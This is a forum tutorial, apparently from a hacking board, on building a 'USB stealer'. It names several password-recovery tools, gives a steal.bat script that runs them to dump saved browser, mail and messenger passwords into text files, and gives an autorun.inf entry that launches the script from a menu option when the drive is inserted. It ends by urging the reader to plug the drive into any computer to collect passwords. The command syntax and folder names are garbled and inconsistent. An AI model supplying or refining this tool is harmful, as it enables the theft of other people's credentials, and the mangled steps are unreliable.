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Locked Make Your Usb stealer


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Here, in this tutorial I will explain how you "make" a USB stealer. A USB stealer, you've seen in movies normally, the spy branch his key on the computer then

removes it and presto, it has the passwords! With this tutorial you can do the same!


Software to download:

- MessenPass

- ChromePass


- Mailpv

- Mspass

- Netpass

- PasswordFox



You can download them here ...

This is the hidden content, please

Step 1:


We will create a program. Bat, which when executed will launch the previous programs and store passwords in a text file.



mspass.exe home / sText Pwd / mspass.txt

mailpv.exe home / sText Pwd / mailpv.txt

pspv.exe home / sText Pwd / pspv.txt

iepv.exe home / sText Pwd / iepv.txt

PasswordFox.exe home / sText Pwd / PasswordFox.txt

ChromePass.exe home / sText Pwd / ChromePass.txt


Rename it steal.bat


Second step:


As you may have seen previously, the passwords will go in a folder mdp. This means creating a file mdp (if necessary I will explain how to create a folder in another tutorial)


Step 3:


When you insert your USB key usually a window appears asking us what we want to do.

In this step we will create a new option in this window, enabling us (once clicked on) to recover the passwords of the PC and stored in the CDM created in step 2.


To realize this open a new text document and type this code:



open = steal.bat

ACTION = "The name of the new option"

Call autorun.inf


Step 4:


Be you've already put all programs on your USB drive, or are doing it now.

To summarize:


- Autorun.inf

- ChromePass.exe

- Iepv.exe

- Mailpv.exe

- Mspass.exe

- Netpass.exe

- PasswordFox.exe

- Pspv.exe

- Steal.bat

- CDM (the file)



This is not remains for you to insert this USB stealer in any computer to retrieve the passes!



Edited by rayane888
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